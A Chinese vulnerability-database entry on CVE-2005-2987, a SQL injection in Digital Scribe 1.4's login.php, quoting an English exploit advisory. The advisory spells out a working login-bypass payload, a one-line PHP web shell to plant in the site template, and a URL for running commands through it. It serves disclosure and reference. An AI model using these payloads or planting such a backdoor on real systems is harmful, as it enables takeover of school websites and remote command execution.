Digital Scribe login.php SQL注入漏洞

Digital Scribe login.php SQL注入漏洞

漏洞ID 1197845 漏洞类型 SQL注入
发布时间 2005-09-19 更新时间 2005-10-20
图片[1]-Digital Scribe login.php SQL注入漏洞-安全小百科CVE编号 CVE-2005-2987
图片[2]-Digital Scribe login.php SQL注入漏洞-安全小百科CNNVD-ID CNNVD-200509-160
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2005090008
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-160
|漏洞详情
DigitalScribe是一个基于WEB的在线处理学生和家庭工作的软件。DigitalScribe1.4版本中的login.php存在SQL注入漏洞,导致远程攻击者通过用户名参数执行任意SQL指令。
|漏洞EXP
Digital Scribe v1.4 Login Bypass / SQL injection / remote code execution

software:

site: http://www.digital-scribe.org/

description: "Teachers have full control through a web-based interface. Designed
for easy installation and even easier use, the  Digital Scribe  has been used in
thousands of  schools. No teacher  or IT Personnel  needs to  know any  computer
languages in order to install and use this intuitive system.

1) Login Bypass / SQL Injection ************************************************

login as admin typing:

login: " or isnull(1/0) /*
password: [whatever]

2) remote code execution *******************************************************
now you can edit template and leave a backdoor on target system:
at the end of the  footer try this:

<?php error_reporting(0); system($HTTP_GET_VARS[cmd]); ?>

then you can launch commands:

http://[target]/[path_to_dscribe]/index.php?cmd=[some_command]

rgod
site: http://rgod.altervista.org
email: retrogod at aliceposta it
original advisory: http://rgod.altervista.org/dscribe14.html
************************************************************************
********
|参考资料

来源:XF
名称:digitalscribe-login-sql-injection(22286)
链接:http://xforce.iss.net/xforce/xfdb/22286
来源:BID
名称:14843
链接:http://www.securityfocus.com/bid/14843
来源:SECUNIA
名称:16841
链接:http://secunia.com/advisories/16841/
来源:MISC
链接:http://rgod.altervista.org/dscribe14.html
来源:BUGTRAQ
名称:20050915DigitalScribev1.4LoginBypass/SQLinjection/remotecodeexecution
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112680124115325&w;=2
来源:OSVDB
名称:19460
链接:http://www.osvdb.org/19460
来源:VUPEN
名称:ADV-2005-1757
链接:http://www.frsirt.com/english/advisories/2005/1757
来源:SECTRACK
名称:1014909
链接:http://securitytracker.com/id?1014909
来源:SREASON
名称:10
链接:http://securityreason.com/securityalert/10

相关推荐: LionMax Software Chat Anywhere User IP Address Obfuscation Vulnerability

LionMax Software Chat Anywhere User IP Address Obfuscation Vulnerability 漏洞ID 1098813 漏洞类型 Input Validation Error 发布时间 2004-03-09 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享